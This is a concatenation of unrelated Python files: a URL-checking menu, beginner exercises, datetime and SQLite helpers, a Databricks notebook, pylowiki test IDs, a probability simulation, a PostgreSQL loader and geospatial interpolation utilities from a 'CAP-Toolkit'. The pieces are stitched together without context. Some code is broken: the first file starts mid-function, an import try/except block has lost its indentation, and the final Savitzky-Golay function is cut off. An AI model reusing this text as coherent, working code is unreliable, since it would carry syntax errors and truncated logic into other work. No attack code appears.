    """Menu loop: add/validate a new URL, re-check a stored one, or exit."""
    choice = 3
    while choice > 0 and choice < 4:
        choice = int(input("1.Enter a new URL\n2.Use previous URL\n3.Exit\n"))
        if choice == 1:
            url = get_url()
            # NOTE(review): a URL that fails the sanity check prints
            # nothing at all -- there is no else branch here.
            if check_url_sanity(url):
                if check_url_validity(url):
                    store_url(url)
                    print("Valid")
                else:
                    print("Invalid")
        elif choice == 2:
            urls = get_urls()
            ctr = 1
            for url in urls:
                print("{}. {}".format(ctr,url.rstrip()))
                ctr += 1
            run_url = int(input("Which URL would you like to run?\n"))
            # NOTE(review): the stored line still ends with '\n' when it is
            # re-validated here -- confirm the server tolerates it.
            if check_url_validity(urls[run_url-1]):
                print("Valid")
            else:
                print("Invalid")
        elif choice == 3:
            exit(0)
# Script entry point: run the interactive URL menu.
if __name__ == '__main__':
    main()
#Write a python script to generate list of no. 0 to 100. Filter out even and odd numbers using lambda + filter function.
# BUG FIX: the original used range(100), which yields 0..99 and silently
# drops 100 from the "0 to 100" list the prompt asks for; range(101) and
# list() replace the manual append loop.
list1 = list(range(101))
even = list(filter(lambda x: x % 2 == 0, list1))
print(even)
print("\nOdd numbers from the said list:")
odd = list(filter(lambda x: x % 2 != 0, list1))
print(odd)
|
import datetime
import pytz
from dateutil.parser import parse
# Unix epoch as a timezone-aware (UTC) datetime; all epoch arithmetic in
# this module subtracts against this reference.
epoch = datetime.datetime.utcfromtimestamp(0)
epoch = epoch.replace(tzinfo=pytz.UTC)
# Module-wide render/parse format, e.g. '2020-01-31 23:59:59 +0000'.
TIME_FORMAT = '%Y-%m-%d %H:%M:%S %z'
# TODO: take mplotlib madates conversion take into consideraiton
def string_to_datetime(str_):
    """Parse a formatted date/time string into a timezone-aware datetime.

    Naive parse results are coerced to UTC so downstream epoch math is
    well-defined.
    """
    parsed = parse(str_)
    if parsed.tzinfo is not None:
        return parsed
    return parsed.replace(tzinfo=pytz.UTC)
def datetime_to_epoch(dt):
    """Return whole seconds between *dt* and the Unix epoch (UTC)."""
    delta = dt - epoch
    return int(delta.total_seconds())
def string_to_epoch(str_):
    """Convert a formatted UTC time string to seconds since the epoch."""
    dt = string_to_datetime(str_)
    return datetime_to_epoch(dt)
def datetime_to_string(dt):
    """Format *dt* using the module-wide TIME_FORMAT pattern."""
    return dt.strftime(TIME_FORMAT)
def epoch_to_datetime(epc):
    """Convert seconds since the epoch into a UTC-aware datetime."""
    return datetime.datetime.fromtimestamp(epc, tz=pytz.utc)
def epoch_to_string(epc):
    """Render seconds-since-epoch as a formatted UTC time string."""
    dt = epoch_to_datetime(epc)
    return datetime_to_string(dt)
# Read a board size, a mine count, and each mine's 1-based coordinates from
# stdin, then print a Minesweeper-style grid: mines are '*' and every other
# cell holds the number of adjacent mines.
row, cols = map(int, input().split())
mine = int(input())
arr = [[0 for i in range(cols)] for j in range(row)]
for i in range(mine):
    _row, _cols = map(int, input().split())
    arr[_row-1][_cols-1] = "*"
for R in range(row):
    for C in range(cols):
        if arr[R][C] == "*":
            # Bump every in-bounds neighbour (and the mine cell itself).
            for _R in range(R-1, R+2):
                for _C in range(C-1, C+2):
                    # Guard against negative indices wrapping to the far side.
                    if _R>=0 and _C>=0:
                        try:
                            # '*' cells are strings, so += raises TypeError
                            # and is deliberately skipped; IndexError covers
                            # the right/bottom edges.
                            arr[_R][_C]+=1
                        except:
                            pass
for i in range(row):
    for j in range(cols):
        print(arr[i][j], end=" ")
    print()
|
# Databricks notebook source
# RDD, Resilient Distributed Data Set
# NOTE(review): relies on the notebook-provided globals ``sc`` and
# ``dbutils``; these cells are not runnable outside Databricks.
data = [1,2,3,4,5,6,7,8,9]
# Spark Context
rdd1 = sc.parallelize(data) # load the input into cluster memory
print("max ", rdd1.max())
# to run it, Shift + Enter key
# COMMAND ----------
print("Min", rdd1.min())
print("mean", rdd1.mean())
print("sum", rdd1.sum())
# COMMAND ----------
# Mount the Azure Blob Storage container at /mnt/movielens.
dbutils.fs.mount(
  source = "wasbs://movielens@gksynapse2storage.blob.core.windows.net",
  mount_point = "/mnt/movielens")
# COMMAND ----------
|
# Test average and grade helpers.
def calc_average(a, b, c, d, e):
    """Print the arithmetic mean of five test scores."""
    print('Average:', sum((a, b, c, d, e)) / 5)
def determine_grade(a):
    """Print the letter grade for a numeric score.

    Uses half-open bands (>=90 A, >=80 B, >=70 C, >=60 D, else F) so that
    fractional scores are graded correctly. The original used closed
    integer ranges (e.g. 80-89), which sent a score such as 89.5 straight
    to 'F', and graded anything above 100 as 'F' as well.
    """
    if a >= 90:
        print('A')
    elif a >= 80:
        print('B')
    elif a >= 70:
        print('C')
    elif a >= 60:
        print('D')
    else:
        print('F')
if __name__ == '__main__':
    # Collect five scores, grade each as it is entered, then report the
    # mean. (Replaces the original's five copy-pasted input/grade pairs.)
    scores = []
    for _ in range(5):
        score = float(input('Grade:'))
        determine_grade(score)
        scores.append(score)
    calc_average(*scores)
|
# Prompt: Write code that takes a long string and builds its word cloud
# data in a dictionary, where the keys are words and the values are the
# number of times the words occurred. Think about capitalized words.
string1 = "After beating the eggs, Dana read the next step:"
def split_words(s):
    """Split *s* into its words followed by the punctuation characters
    that were stripped out of it, each in order of appearance."""
    kept = [ch for ch in s if ch.isalpha() or ch == " "]
    stripped = [ch for ch in s if not (ch.isalpha() or ch == " ")]
    return "".join(kept).split(" ") + stripped
def check_case(lst):
    # NOTE(review): unfinished stub — builds an empty list and implicitly
    # returns None; nothing in this file calls it.
    ret = []
def prep_word_cloud_data(s):
    """Build word-cloud data for *s*: a dict mapping each lower-cased
    token (word or punctuation character) to its occurrence count."""
    counts = {}
    for token in split_words(s):
        token = token.lower()
        counts[token] = counts.get(token, 0) + 1
    return counts
print(prep_word_cloud_data(string1))
|
import sqlite3
from sqlite3 import Error
def create_connection(clothes):
    """Open a throwaway connection to the SQLite database file *clothes*.

    Prints the sqlite3 module version when the connection succeeds, or
    the error otherwise; the connection is always closed before return.
    """
    conn = None
    try:
        conn = sqlite3.connect(clothes)
    except Error as exc:
        print(exc)
    else:
        print(sqlite3.version)
    finally:
        if conn is not None:
            conn.close()
if __name__ == '__main__':
    create_connection(r"C:\sqlite\db\clothes.db")
# Connect to the database file.
# NOTE(review): "database.py" is an odd name for an SQLite database file
# (it looks like a Python module) — confirm the intended path.
connection = sqlite3.connect("database.py")
# cursor
crsr = connection.cursor()
# print statement will execute if there are no errors
print("Connected to the database")
# SQL command to create a table in the database.
# FIX: the original built this string but never executed it (and the
# statement was missing its closing parenthesis), so every INSERT below
# failed with "no such table". IF NOT EXISTS makes re-runs idempotent.
sql_command = """CREATE TABLE IF NOT EXISTS clothes (
id_number INTEGER PRIMARY KEY,
item_name VARCHAR(20),
color VARCHAR(20),
fabric VARCHAR(20),
hood CHAR(3),
brand VARCHAR(20));"""
crsr.execute(sql_command)
# Sample data: primary keys, item names, colors, fabrics, hood flag, brand.
pk = [1, 2, 3, 4, 5, 6]
item_name = ['Atom', 'Ansur', 'Beta', 'Superior Down', 'Event']
color = ['Blue', 'Brown', 'Maroon', 'Brown', 'Green']
fabric = ['Down', 'Ripstop', 'Goretex', 'Down', 'Ripstop']
hood = ['No', 'Yes', 'Yes', 'No', 'Yes']
brand = ['Arcteryx', 'Klattermusen', 'Arcteryx', 'Mont Bell', 'And Wander']
# Parameterized INSERT instead of f-string interpolation: avoids SQL
# injection and quoting bugs.
rows = list(zip(pk, item_name, color, fabric, hood, brand))
crsr.executemany("INSERT INTO clothes VALUES (?, ?, ?, ?, ?, ?)", rows)
# To save the changes in the files. Never skip this.
# If we skip this, nothing will be saved in the database.
connection.commit()
# Fetch and display everything that was stored.
crsr.execute("SELECT * FROM clothes")
for row in crsr.fetchall():
    print(row)
# close the connection
connection.close()
# -*- coding: utf-8 -*-
from pylowiki.tests import *
# DOM ids / form-field names used by the functional tests. Each helper
# returns the identifier of one UI element so that tests reference the
# markup in a single place.
def addComment():
    return 'commentAddHandler_root'
def addComment_text():
    return 'comment-textarea'
def addComment_submit():
    return 'reply'
def addConversation():
    return 'addDiscussion'
def addConversation_text():
    return 'text'
def addConversation_title():
    return 'title'
def addIdea():
    return 'addIdea'
def addIdea_submit():
    # NOTE(review): intentionally empty? confirm the submit control's name.
    return ''
def editIdea_submit():
    return 'reply'
def addIdea_text():
    return 'title'
def addResource():
    return 'addResource'
def addResource_title():
    return 'title'
def addResource_link():
    return 'link'
def addResource_text():
    return 'text'
def createWorkshop_1_form():
    return 'CreateWorkshop'
def create_workshop_1_personal_professional(kwargs=None):
    """Return the submit-button value for creating a workshop.

    FIX: the original tested ``'personal' == True`` — a constant string
    compared to True, which is always False — instead of the value stored
    under the 'personal' key. Every branch still resolves to
    'createPersonal' because the professional payment form cannot yet be
    driven without selenium (see note below), so observable behaviour is
    unchanged.
    """
    if kwargs is not None and 'personal' in kwargs:
        if kwargs['personal']:
            return 'createPersonal'
        #: if we get selenium to drive this test,
        #: we will be able to use the javascript for actually processing the payment form.
        #: For now, we'll need to create a personal workshop but manually set it as professional
        #: return 'createProfessional'
        return 'createPersonal'
    return 'createPersonal'
# --- workshop creation / payment / login / settings identifiers ---------
def createWorkshop_paymentForm():
    return 'paymentForm'
def create_workshop_paymentToken():
    return 'stripeToken'
def create_workshop_paymentToken_val():
    # Canned Stripe test token used by the payment tests.
    return 'tok_19tVR0n1Mz7qua'
def createWorkshop_button():
    return 'CreateWorkshop'
def createWorkshop_FileUploadForm():
    return 'fileupload'
def createWorkshop_2_Basics():
    return 'edit_issue'
def createWorkshopForm1_description():
    return 'description'
def createWorkshopForm1_goals():
    return 'goals'
def createWorkshopForm1_resources():
    return 'allowResources'
def createWorkshopForm1_suggestions():
    return 'allowSuggestions'
def createWorkshopForm1_title():
    return 'title'
def createWorkshopForm2(private=True):
    # Field name depends on whether the workshop is private or scoped.
    if private:
        return 'private'
    else:
        return 'scope'
def createWorkshopForm2_submit():
    return 'continueToNext'
def createWorkshopForm3():
    return 'workshop_tags'
def createWorkshopForm4_continueToNext():
    return 'continueToNext'
def createWorkshopForm5_wikiBackground():
    return 'workshop_background'
def createWorkshopForm5_wikiBackground_text():
    return 'data'
def createWorkshopForm5_wikiBackground_submit():
    # NOTE(review): intentionally empty? confirm the submit control's name.
    return ''
def editComment_submit():
    return 'reply'
def login_email():
    return 'email'
def login_homePage():
    return 'sign_in'
def login_password():
    return 'password'
def parameter_submit():
    return 'submit'
def paymentForm():
    return 'paymentForm'
def paymentFormAdminUpgrade():
    return 'adminUpgradeForm'
def paymentFormAdminUpgradeSubmitName():
    return 'admin-submit-button'
def profile_edit():
    return 'infoEdit'
def submitNone():
    # Used where a test must submit a form without naming a submit control.
    return None
def upgradeWorkshop():
    return 'workshopUpgrade'
def workshopSettings_allowIdeas(choice=True):
    """Takes bool input and returns form-specific input value replacing the parameter's value."""
    if choice:
        return u'1'
    else:
        return u'0'
def workshopSettings_allowResourceLinks(choice=True):
    """Takes bool input and returns form-specific input value replacing the parameter's value."""
    if choice:
        return u'1'
    else:
        return u'0'
def workshopSettings_privateForm():
    return u'private'
def workshopSettings_privateForm_addMemberField():
    return u'addMember'
def workshopSettings_privateForm_invite():
    return u'newMember'
# looks like this input field is no longer used
#def workshopSettings_privateForm_sendInviteMsg():
#    return u'sendInvite'
|
from copy import deepcopy
import random
# Consider using the modules imported above.
class Hat:
    """A hat holding colored balls, e.g. ``Hat(red=2, blue=1)``.

    Each keyword argument is a color and its ball count; ``contents`` is
    the flat list of ball colors currently in the hat.
    """
    def __init__(self, **kwargs):
        self.__dict__.update(kwargs)
        self.contents = list()
        for color, count in kwargs.items():
            self.contents.extend([color] * count)

    def draw(self, numberOfBalls):
        """Remove and return ``numberOfBalls`` random balls.

        If more balls are requested than remain, all balls are returned
        and the hat is emptied. (FIX: the original returned the live
        ``contents`` list without removing the balls, aliasing internal
        state to the caller and leaving the hat full.)
        """
        if numberOfBalls >= len(self.contents):
            drawn = self.contents[:]
            self.contents.clear()
            return drawn
        drawn = random.sample(self.contents, numberOfBalls)
        for ball in drawn:
            self.contents.remove(ball)
        return drawn
def experiment(hat, expected_balls, num_balls_drawn, num_experiments):
    """Estimate the probability that drawing ``num_balls_drawn`` balls
    from ``hat`` yields at least the balls listed in ``expected_balls``.

    Args:
        hat: Hat instance (deep-copied each trial, so the input hat is
            never mutated).
        expected_balls: dict mapping color -> minimum required count.
        num_balls_drawn: number of balls drawn per trial.
        num_experiments: number of trials to run.

    Returns:
        float: successes / num_experiments.

    FIX: the original compared ``set(draw) == set(expected)``, which
    ignores ball counts and also fails whenever the draw contains an
    extra color; the success criterion is that the draw contains at
    least the expected number of each expected color.
    """
    successes = 0
    for _ in range(num_experiments):
        trial_hat = deepcopy(hat)
        drawn = trial_hat.draw(num_balls_drawn)
        counts = {}
        for ball in drawn:
            counts[ball] = counts.get(ball, 0) + 1
        if all(counts.get(color, 0) >= need
               for color, need in expected_balls.items()):
            successes += 1
    return successes / num_experiments
import psycopg2
import psycopg2.extras
if __name__ == '__main__' :
    # Connection string for the local 'resort' PostgreSQL database.
    connection_string = "host= 'localhost' dbname='resort' user='resort' password='resort'"
    # DictCursor lets rows be accessed by column name as well as by index.
    conn = psycopg2.connect(connection_string,cursor_factory=psycopg2.extras.DictCursor )
    ###this part is to drop the existed tables and the data we have already loaded, and reloaded
    # schema.sql is executed wholesale; it is expected to contain the
    # DROP/CREATE/LOAD statements that rebuild the schema from scratch.
    with open('schema.sql','r') as setup:
        cursor = conn.cursor()
        setup_queries = setup.read()
        cursor.execute(setup_queries)
    conn.commit()
|
"""
High-level functions used across the CAP-Toolkit package.
"""
import h5py
import numpy as np
import pyproj
import xarray as xr
import pandas as pd
from scipy.spatial import cKDTree
from scipy.spatial.distance import cdist
from scipy import stats
from scipy.ndimage import map_coordinates
try:
from gdalconst import *
except ImportError as e:
from osgeo.gdalconst import *
from osgeo import gdal, osr
from scipy import signal
def print_args(args):
    """Echo an argparse namespace, one (name, value) tuple per line."""
    print("Input arguments:")
    for name_value in vars(args).items():
        print(name_value)
def read_h5(fname, vnames):
    """Read the named datasets from an HDF5 file.

    vnames : ['var1', 'var2', 'var3']

    Returns a list of arrays for multiple names, or the bare array when
    a single name is requested.
    """
    with h5py.File(fname, "r") as hdf:
        data = [hdf[name][()] for name in vnames]
    if len(vnames) > 1:
        return data
    return data[0]
def save_h5(fname, vardict, mode="a"):
    """Write each {name: array} pair of ``vardict`` to an HDF5 file.

    Existing datasets are overwritten in place; new ones are created.
    Values are squeezed of singleton dimensions before writing.
    """
    with h5py.File(fname, mode) as hdf:
        for name, value in vardict.items():
            value = np.squeeze(value)
            if name in hdf:
                hdf[name][:] = value
            else:
                hdf[name] = value
def is_empty(ifile):
    """Return True if the HDF5 file is unreadable, corrupted, or
    contains no datasets."""
    try:
        with h5py.File(ifile, "r") as hdf:
            return not list(hdf.keys())
    except IOError:
        return True
def find_nearest(arr, val):
    """Find index (indices) of the entry in ``arr`` nearest to ``val``.

    Args:
        arr (ndarray): array to search (nd, need not be sorted).
        val: scalar or array of values to locate.

    Returns:
        Index of the nearest entry; computed via ``np.unravel_index`` so
        an nd ``arr`` yields a tuple of index arrays. For scalar or 1-d
        ``val`` only the first axis of that tuple is returned, matching
        the original behaviour.

    See also:
        find_nearest2
    """
    targets = np.array([val]) if np.ndim(val) == 0 else val
    flat = [np.abs(arr - t).argmin() for t in targets]
    unravelled = np.unravel_index(flat, arr.shape)
    return unravelled if targets.ndim > 1 else unravelled[0]
def make_grid(xmin, xmax, ymin, ymax, dx, dy, return_2d=False):
    """Build a regular grid covering the given bounding box.

    :param xmin: x-coord. min
    :param xmax: x-coord. max
    :param ymin: y-coord. min
    :param ymax: y-coord. max
    :param dx: x-resolution
    :param dy: y-resolution
    :param return_2d: if true return 2-D meshgrid arrays, else 1-D axes
    :return: 2D grid or 1D vectors (xi, yi)
    """
    n_y = int(np.abs(ymax - ymin) / dy) + 1
    n_x = int(np.abs(xmax - xmin) / dx) + 1
    axis_x = np.linspace(xmin, xmax, num=n_x)
    axis_y = np.linspace(ymin, ymax, num=n_y)
    if return_2d:
        return np.meshgrid(axis_x, axis_y)
    return axis_x, axis_y
def transform_coord(proj1, proj2, x, y):
    """Transform coordinates between two EPSG reference systems.

    :param proj1: source EPSG number (e.g. 4326)
    :param proj2: target EPSG number (e.g. 3031)
    :param x: x-coord in the source system
    :param y: y-coord in the source system
    :return: (x, y) in the target system

    NOTE(review): the '+init=EPSG:n' syntax and ``pyproj.transform`` are
    deprecated in pyproj 2+; ``Transformer.from_crs`` is the modern API.
    """
    src = pyproj.Proj("+init=EPSG:" + str(proj1))
    dst = pyproj.Proj("+init=EPSG:" + str(proj2))
    return pyproj.transform(src, dst, x, y)
def mad_std(x, axis=None):
    """Robust standard deviation via the median absolute deviation.

    The MAD is scaled by 1.4826 so it estimates the std.dev of normally
    distributed data.

    :param x: data values
    :param axis: target axis for the computation
    :return: robust std.dev (MAD-based)
    """
    deviations = np.abs(x - np.nanmedian(x, axis))
    return 1.4826 * np.nanmedian(deviations, axis)
def interpmed(x, y, z, Xi, Yi, n, d):
    """2-D median interpolation of scattered data.

    :param x: x-coord (m)
    :param y: y-coord (m)
    :param z: values
    :param Xi: x-coord. grid (2D)
    :param Yi: y-coord. grid (2D)
    :param n: number of nearest neighbours
    :param d: maximum distance allowed (m)
    :return: 1D array of interpolated values (NaN where no prediction)
    """
    pts_x = Xi.ravel()
    pts_y = Yi.ravel()
    out = np.full(len(pts_x), np.nan)
    tree = cKDTree(np.c_[x, y])
    for i, (px, py) in enumerate(zip(pts_x, pts_y)):
        dxy, idx = tree.query((px, py), k=n)
        # With a single neighbour the distance is scalar and the screen
        # is skipped; otherwise skip points whose nearest neighbour is
        # farther than d.
        if n != 1 and dxy.min() > d:
            continue
        out[i] = np.median(z[idx])
    return out
def interpgaus(x, y, z, s, Xi, Yi, n, d, a):
    """
    2D interpolation using a gaussian kernel
    weighted by distance and error
    :param x: x-coord (m)
    :param y: y-coord (m)
    :param z: values
    :param s: obs. errors
    :param Xi: x-coord. interp. point(s) (m)
    :param Yi: y-coord. interp. point(s) (m)
    :param n: number of nearest neighbours
    :param d: maximum distance allowed (m)
    :param a: correlation length in distance (m)
    :return: 1D vec. of prediction, sigma and nobs
    """
    xi = Xi.ravel()
    yi = Yi.ravel()
    # Outputs default to NaN where no prediction is made.
    zi = np.zeros(len(xi)) * np.nan
    ei = np.zeros(len(xi)) * np.nan
    ni = np.zeros(len(xi)) * np.nan
    tree = cKDTree(np.c_[x, y])
    # All-NaN errors: fall back to equal (unit) weighting.
    if np.all(np.isnan(s)): s = np.ones(s.shape)
    for i in range(len(xi)):
        (dxy, idx) = tree.query((xi[i], yi[i]), k=n)
        # With k=1 the distance is scalar, so the min() screen applies
        # only for n > 1; too-distant points stay NaN.
        if n == 1:
            pass
        elif dxy.min() > d:
            continue
        else:
            pass
        zc = z[idx]
        sc = s[idx]
        if len(zc[~np.isnan(zc)]) == 0: continue
        # Weights: inverse error variance times gaussian distance decay
        wc = (1./sc**2) * np.exp(-(dxy**2)/(2*a**2))
        # Avoid singularity
        wc += 1e-6
        # Predicted value
        zi[i] = np.nansum(wc * zc) / np.nansum(wc)
        # Weighted rmse
        sigma_r = np.nansum(wc * (zc - zi[i])**2) / np.nansum(wc)
        # Obs. error
        sigma_s = 0 if np.all(s == 1) else np.nanmean(sc)
        # Prediction error
        ei[i] = np.sqrt(sigma_r ** 2 + sigma_s ** 2)
        # Number of points in prediction
        ni[i] = 1 if n == 1 else len(zc)
    return zi, ei, ni
def interpkrig(x, y, z, s, Xi, Yi, d, a, n):
    """
    2D interpolation using ordinary kriging/collocation
    with second-order markov covariance model.
    :param x: x-coord (m)
    :param y: y-coord (m)
    :param z: values
    :param s: obs. error added to diagonal
    :param Xi: x-coord. interp. point(s) (m)
    :param Yi: y-coord. interp. point(s) (m)
    :param d: maximum distance allowed (m)
    :param a: correlation length in distance (m)
    :param n: number of nearest neighbours
    :return: 1D vec. of prediction, sigma and nobs
    """
    n = int(n)
    # Check
    if n == 1:
        print('n > 1 needed!')
        return
    xi = Xi.ravel()
    yi = Yi.ravel()
    # Outputs default to NaN where no prediction is made.
    zi = np.zeros(len(xi)) * np.nan
    ei = np.zeros(len(xi)) * np.nan
    ni = np.zeros(len(xi)) * np.nan
    tree = cKDTree(np.c_[x, y])
    # Convert to meters
    # NOTE(review): d and a are documented as metres but are scaled from
    # km here (a also gets a 0.595 factor for the second-order Markov
    # model) — confirm the expected input units with the callers.
    a *= 0.595 * 1e3
    d *= 1e3
    for i in range(len(xi)):
        (dxy, idx) = tree.query((xi[i], yi[i]), k=n)
        if dxy.min() > d:
            continue
        xc = x[idx]
        yc = y[idx]
        zc = z[idx]
        sc = s[idx]
        if len(zc) < 2: continue
        # Local mean and variance used by the collocation model.
        m0 = np.median(zc)
        c0 = np.var(zc)
        # Covariance function for Dxy
        Cxy = c0 * (1 + (dxy / a)) * np.exp(-dxy / a)
        # Compute pair-wise distance
        dxx = cdist(np.c_[xc, yc], np.c_[xc, yc], "euclidean")
        # Covariance function Dxx
        Cxx = c0 * (1 + (dxx / a)) * np.exp(-dxx / a)
        # Measurement noise matrix
        N = np.eye(len(Cxx)) * sc * sc
        # Solve for the inverse
        CxyCxxi = np.linalg.solve((Cxx + N).T, Cxy.T)
        # Predicted value
        zi[i] = np.dot(CxyCxxi, zc) + (1 - np.sum(CxyCxxi)) * m0
        # Predicted error
        ei[i] = np.sqrt(np.abs(c0 - np.dot(CxyCxxi, Cxy.T)))
        # Number of points in prediction
        ni[i] = len(zc)
    return zi, ei, ni
def spatial_filter(x, y, z, dx, dy, n_sigma=3.0):
    """
    Spatial outlier editing filter
    :param x: x-coord (m)
    :param y: y-coord (m)
    :param z: values
    :param dx: filter res. in x (m)
    :param dy: filter res. in y (m)
    :param n_sigma: cutt-off value
    :param thres: max absolute value of data
    :return: filtered array containing nan-values
    """
    # Number of grid cells needed to tile the data extent.
    Nn = int((np.abs(y.max() - y.min())) / dy) + 1
    Ne = int((np.abs(x.max() - x.min())) / dx) + 1
    # Bin the points; binnumber maps each point to its 2-D bin.
    f_bin = stats.binned_statistic_2d(x, y, z, bins=(Ne, Nn))
    index = f_bin.binnumber
    ind = np.unique(index)
    zo = z.copy()
    for i in range(len(ind)):
        # index for each bin
        idx, = np.where(index == ind[i])
        zb = z[idx]
        if len(zb[~np.isnan(zb)]) == 0:
            continue
        # Residuals from the bin median; edit points deviating by more
        # than n_sigma standard deviations.
        dh = zb - np.nanmedian(zb)
        foo = np.abs(dh) > n_sigma * np.nanstd(dh)
        zb[foo] = np.nan
        zo[idx] = zb
    return zo
def interp2d(x, y, z, xi, yi, **kwargs):
    """Raster-to-point interpolation via scipy.ndimage.map_coordinates.

    :param x: x-coord. in 2D (m)
    :param y: y-coord. in 2D (m)
    :param z: values in 2D
    :param xi: interp. point(s) in x (m)
    :param yi: interp. point(s) in y (m)
    :param kwargs: passed to map_coordinates (e.g. order=1)
    :return: array of interpolated values
    """
    # Flip the raster so the row axis runs in the direction expected by
    # the fractional-index computation below.
    x = np.flipud(x)
    y = np.flipud(y)
    z = np.flipud(z)
    x = x[0, :]
    y = y[:, 0]
    nx, ny = x.size, y.size
    # Broadcast a scalar coordinate against the other vector.
    # FIX: the original called the undefined name `ones`, raising
    # NameError whenever one of xi/yi was scalar; np.ones was intended.
    if np.size(xi) == 1 and np.size(yi) > 1:
        xi = xi * np.ones(np.size(yi))
    elif np.size(yi) == 1 and np.size(xi) > 1:
        yi = yi * np.ones(np.size(xi))
    # Convert physical coordinates to fractional pixel indices.
    xp = (xi - x[0]) * (nx - 1) / (x[-1] - x[0])
    yp = (yi - y[0]) * (ny - 1) / (y[-1] - y[0])
    coord = np.vstack([yp, xp])
    return map_coordinates(z, coord, **kwargs)
def tiffread(ifile):
    """
    Reading tif-file to memory
    :param ifile: path+name of tif file
    :return: X, Y, Z, dx, dy and proj
    """
    file = gdal.Open(ifile, GA_ReadOnly)
    metaData = file.GetMetadata()
    projection = file.GetProjection()
    src = osr.SpatialReference()
    src.ImportFromWkt(projection)
    proj = src.ExportToWkt()
    Nx = file.RasterXSize
    Ny = file.RasterYSize
    # Affine geotransform: (ulx, dx, xrot, uly, yrot, dy).
    trans = file.GetGeoTransform()
    dx = trans[1]
    dy = trans[5]
    # Pixel-centre coordinates (+0.5) for every cell in the raster.
    Xp = np.arange(Nx)
    Yp = np.arange(Ny)
    (Xp, Yp) = np.meshgrid(Xp, Yp)
    X = trans[0] + (Xp + 0.5) * trans[1] + (Yp + 0.5) * trans[2]
    Y = trans[3] + (Xp + 0.5) * trans[4] + (Yp + 0.5) * trans[5]
    band = file.GetRasterBand(1)
    Z = band.ReadAsArray()
    # Return positive grid spacings (dy in a GDAL geotransform is
    # negative for north-up rasters).
    dx = np.abs(dx)
    dy = np.abs(dy)
    return X, Y, Z, dx, dy, proj
def tiffwrite(ofile, X, Y, Z, dx, dy, proj, otype='float'):
    """Write a raster to a GeoTIFF file.

    :param ofile: name of output file
    :param X: x-coord of raster (2D)
    :param Y: y-coord of raster (2D)
    :param Z: values (2D)
    :param dx: grid-spacing x
    :param dy: grid-spacing y
    :param proj: projection (epsg number)
    :param otype: save as 'int' or 'float'
    :raises ValueError: if ``otype`` is neither 'int' nor 'float'
        (the original fell through to an undefined variable and raised
        a confusing NameError in that case).
    """
    proj = int(proj)
    N, M = Z.shape
    driver = gdal.GetDriverByName("GTiff")
    if otype == 'int':
        datatype = gdal.GDT_Int32
    elif otype == 'float':
        datatype = gdal.GDT_Float32
    else:
        raise ValueError("otype must be 'int' or 'float', got %r" % (otype,))
    ds = driver.Create(ofile, M, N, 1, datatype)
    src = osr.SpatialReference()
    src.ImportFromEPSG(proj)
    # Upper-left corner of the upper-left pixel; GDAL geotransforms use
    # a negative dy for north-up rasters.
    ulx = np.min(np.min(X)) - 0.5 * dx
    uly = np.max(np.max(Y)) + 0.5 * dy
    geotransform = [ulx, dx, 0, uly, 0, -dy]
    ds.SetGeoTransform(geotransform)
    ds.SetProjection(src.ExportToWkt())
    ds.GetRasterBand(1).SetNoDataValue(np.nan)
    ds.GetRasterBand(1).WriteArray(Z)
    ds = None
def binning(x, y, xmin=None, xmax=None, dx=1 / 12.,
            window=3 / 12., interp=False, median=False):
    """Time-series binning (w/overlapping windows).

    Args:
        x,y: time and value of time series.
        xmin,xmax: time span of returned binned series
            (defaults to the data range).
        dx: time step of binning.
        window: size of binning window (bins overlap when window > dx).
        interp: interpolate binned values to original x points.
        median: use the median instead of the mean per bin.

    Returns:
        (xb, yb, eb, nb, sb): bin centres, binned values, MAD-based
        errors, counts of finite values, and per-bin sums.
    """
    if xmin is None:
        xmin = np.nanmin(x)
    if xmax is None:
        xmax = np.nanmax(x)
    steps = np.arange(xmin, xmax, dx)  # time steps
    bins = [(ti, ti + window) for ti in steps]  # bin limits
    N = len(bins)
    yb = np.full(N, np.nan)
    xb = np.full(N, np.nan)
    eb = np.full(N, np.nan)
    nb = np.full(N, np.nan)
    sb = np.full(N, np.nan)
    for i in range(N):
        t1, t2 = bins[i]
        idx, = np.where((x >= t1) & (x <= t2))
        if len(idx) == 0:
            # Empty bin: keep the centre time, leave the stats NaN.
            xb[i] = 0.5 * (t1 + t2)
            continue
        ybv = y[idx]
        yb[i] = np.nanmedian(ybv) if median else np.nanmean(ybv)
        xb[i] = 0.5 * (t1 + t2)
        eb[i] = mad_std(ybv)
        nb[i] = np.sum(~np.isnan(ybv))
        sb[i] = np.sum(ybv)
    if interp:
        # Best-effort: fall back to the binned series if interpolation
        # fails. (FIX: the original bare `except:` also swallowed
        # KeyboardInterrupt/SystemExit.)
        try:
            yb = np.interp(x, xb, yb)
            eb = np.interp(x, xb, eb)
            sb = np.interp(x, xb, sb)
            xb = x
        except (ValueError, TypeError):
            pass
    return xb, yb, eb, nb, sb
def hampel_filter1d(x, k, t0=3):
    """Hampel filter for outlier editing.

    A sample is replaced by NaN when it deviates from the median of its
    (2k+1)-wide window by more than ``t0`` scaled local MADs.

    :param x: values (coerced to float; NaNs are ignored in the local stats)
    :param k: window half-width (int)
    :param t0: sigma threshold value
    :return: filtered copy of ``x`` with outliers set to NaN

    Fixes vs the original: the array is padded with NaN directly instead
    of a 9999 sentinel (which clobbered any legitimate 9999 values), and
    the loop starts at the first real sample instead of the second (an
    off-by-one that left x[0] unfiltered).
    """
    x = np.pad(x.astype(float), k, 'constant', constant_values=np.nan)
    n = len(x)
    y = x.copy()
    L = 1.4826  # MAD -> std.dev scale factor for normal data
    for i in range(k, n - k):
        window = x[(i - k):(i + k + 1)]
        if np.isnan(window).all():
            continue
        x0 = np.nanmedian(window)
        S0 = L * np.nanmedian(np.abs(window - x0))
        if np.abs(x[i] - x0) > t0 * S0:
            y[i] = np.nan
    return y[k:-k]
def sgolay1d(h, window=3, order=1, deriv=0, dt=1.0, mode="nearest", time=None):
    """Savitztky-Golay filter with support for NaNs.
    If time is given, interpolate NaNs otherwise pad w/zeros.
    If time is given, calculate dt as t[1]-t[0].
    Args:
        dt (int): spacing between samples (for correct units).
    Notes:
        Works with numpy, pandas and xarray objects.
    """
    # Unwrap pandas/xarray containers to plain ndarrays.
    if isinstance(h, (pd.Series, xr.DataArray)):
        h = h.values
    if isinstance(time, (pd.Series, xr.DataArray)):
        time = time.values
    _h = h.copy()
    (i_nan,) = np.where(np.isnan(_h))
    (i_valid,) = np.where(np.isfinite(_h))
    # Too few valid samples to filter: return the copy unchanged.
    if i_valid.size < 5:
        return _h
    elif time is not None:
        # Fill gaps by linear interpolation in time; dt is derived from
        # the first two time samples (assumes uniform spacing).
        _h[i_nan] = np.interp(time[i_nan], time[i_valid], _h[i_valid])
